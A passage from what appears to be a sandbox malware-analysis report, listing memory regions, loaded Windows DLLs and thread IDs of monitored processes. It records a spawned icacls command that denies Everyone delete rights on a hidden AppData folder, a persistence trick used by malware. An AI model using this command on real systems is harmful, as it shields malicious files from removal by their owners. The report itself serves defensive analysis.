0x7fefd4dcfff monitored = 0 entry_point = 0x7fefd491070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 771 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 772 start_va = 0x7fefd6f0000 end_va = 0x7fefe477fff monitored = 0 entry_point = 0x7fefd76cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 773 start_va = 0x7fefe480000 end_va = 0x7fefe656fff monitored = 0 entry_point = 0x7fefe481010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 774 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 775 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 776 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 777 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 778 start_va = 0x7fefea60000 end_va = 0x7fefeab1fff monitored = 0 entry_point = 0x7fefea610d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 779 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 780 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 781 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 782 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 783 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 784 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 785 start_va = 0x7fefeff0000 end_va = 0x7fefeff7fff monitored = 0 entry_point = 0x7fefeff1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 786 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 787 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 788 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 789 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 790 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 791 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 792 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 793 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 794 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 795 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 796 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 797 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 798 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 799 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 800 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 801 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 802 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 803 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 804 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 805 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 806 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 807 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 808 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 809 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 810 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 811 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 812 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 813 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 814 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 815 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 816 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 817 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 818 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 819 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 820 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 821 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 822 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 823 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 824 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 825 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 826 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 827 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 828 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 829 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 830 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 831 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 832 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 833 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 834 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 835 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 836 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 837 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 838 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 839 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 840 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1327 start_va = 0x9d0000 end_va = 0x9dffff monitored = 0 entry_point = 0x9d3e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1328 start_va = 0x9e0000 end_va = 0x9e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1329 start_va = 0x7fefad60000 end_va = 0x7fefad9efff monitored = 0 entry_point = 0x7fefad612c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1514 start_va = 0x7fef84b0000 end_va = 0x7fef8683fff monitored = 0 entry_point = 0x7fef84e6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1515 start_va = 0x5e00000 end_va = 0x5feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1516 start_va = 0x5e00000 end_va = 0x5f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1517 start_va = 0x5f70000 end_va = 0x5feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f70000" filename = "" Region: id = 1518 start_va = 0x5ff0000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ff0000" filename = "" Region: id = 1519 start_va = 0x6100000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1520 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1521 start_va = 0x16b0000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1522 start_va = 0x2360000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1523 start_va = 0x7fefb780000 end_va = 0x7fefb794fff monitored = 0 entry_point = 0x7fefb781010 region_type = mapped_file name = "aelupsvc.dll" filename = "\\Windows\\System32\\aelupsvc.dll" (normalized: "c:\\windows\\system32\\aelupsvc.dll") Region: id = 1524 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1525 start_va = 0x7fef87e0000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef87e11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1526 start_va = 0x6500000 end_va = 0x673ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1527 start_va = 0x9e0000 end_va = 0x9e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1528 start_va = 0x6500000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1529 start_va = 0x66c0000 end_va = 0x673ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066c0000" filename = "" Region: id = 1530 start_va = 0x4360000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 1531 start_va = 0x4a10000 end_va = 0x4a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 1532 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1533 start_va = 0x6650000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 1534 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1535 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1536 start_va = 0x31e0000 end_va = 0x325ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1537 start_va = 0x3af0000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 1538 start_va = 0x5e00000 end_va = 0x5ea9fff monitored = 0 entry_point = 0x5e04104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1539 start_va = 0x5eb0000 end_va = 0x5f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 1540 start_va = 0x6760000 end_va = 0x67dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006760000" filename = "" Region: id = 1541 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1542 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1543 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1544 start_va = 0xab0000 end_va = 0xabcfff monitored = 0 entry_point = 0xaba138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 1545 start_va = 0x67e0000 end_va = 0x6a2efff monitored = 0 entry_point = 0x67e236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1546 start_va = 0xab0000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1547 start_va = 0xab0000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1548 start_va = 0xab0000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Thread: id = 9 os_tid = 0xeb8 Thread: id = 10 os_tid = 0xeb4 Thread: id = 11 os_tid = 0xe3c Thread: id = 12 os_tid = 0xe30 Thread: id = 13 os_tid = 0xde0 Thread: id = 14 os_tid = 0xd98 Thread: id = 15 os_tid = 0xd94 Thread: id = 16 os_tid = 0xa30 Thread: id = 17 os_tid = 0x86c Thread: id = 18 os_tid = 0x864 Thread: id = 19 os_tid = 0x364 Thread: id = 20 os_tid = 0x4ec Thread: id = 21 os_tid = 0x3bc Thread: id = 22 os_tid = 0x7c0 Thread: id = 23 os_tid = 0x5c4 Thread: id = 24 os_tid = 0x6d4 Thread: id = 25 os_tid = 0x3ac Thread: id = 26 os_tid = 0x23c Thread: id = 27 os_tid = 0x238 Thread: id = 28 os_tid = 0x224 Thread: id = 29 os_tid = 0x480 Thread: id = 30 os_tid = 0x5f4 Thread: id = 31 os_tid = 0x564 Thread: id = 32 os_tid = 0x7c4 Thread: id = 33 os_tid = 0x5b8 Thread: id = 34 os_tid = 0x580 Thread: id = 35 os_tid = 0x418 Thread: id = 36 os_tid = 0x2b0 Thread: id = 37 os_tid = 0x6cc Thread: id = 38 os_tid = 0x6c4 Thread: id = 39 os_tid = 0x688 Thread: id = 40 os_tid = 0x668 Thread: id = 41 os_tid = 0x63c Thread: id = 42 os_tid = 0x604 Thread: id = 43 os_tid = 0x600 Thread: id = 44 os_tid = 0x5e8 Thread: id = 45 os_tid = 0x5dc Thread: id = 46 os_tid = 0x5cc Thread: id = 47 os_tid = 0x444 Thread: id = 48 os_tid = 0x440 Thread: id = 49 os_tid = 0x434 Thread: id = 50 os_tid = 0x42c Thread: id = 51 os_tid = 0x420 Thread: id = 52 os_tid = 0x214 Thread: id = 53 os_tid = 0x3f4 Thread: id = 54 os_tid = 0x3ec Thread: id = 55 os_tid = 0x3e0 Thread: id = 56 os_tid = 0x384 Thread: id = 57 os_tid = 0x37c Thread: id = 58 os_tid = 0x374 Thread: id = 59 os_tid = 0x36c Thread: id = 107 os_tid = 0xcb4 Thread: id = 108 os_tid = 0x620 Thread: id = 109 os_tid = 0x3a4 Thread: id = 110 os_tid = 0x8ac Thread: id = 111 os_tid = 0xce8 Thread: id = 112 os_tid = 0x8a8 Thread: id = 113 os_tid = 0x894 Thread: id = 114 os_tid = 0x8a4 Thread: id = 115 os_tid = 0x88c Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x433c0000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf20" cmd_line = "icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 844 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 845 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 846 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 847 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 848 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 849 start_va = 0x70000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 850 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 851 start_va = 0x4a0000 end_va = 0x4a9fff monitored = 0 entry_point = 0x4a5489 region_type = mapped_file name = "icacls.exe" filename = "\\Windows\\SysWOW64\\icacls.exe" (normalized: "c:\\windows\\syswow64\\icacls.exe") Region: id = 852 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 853 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 854 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 855 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 856 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 857 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 858 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 859 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 860 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 861 start_va = 0x150000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 862 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 863 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 864 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 865 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 866 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 867 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 868 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 869 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 870 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 871 start_va = 0x1d0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 872 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 873 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 874 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 875 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 876 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 877 start_va = 0x2d0000 end_va = 0x336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 878 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = 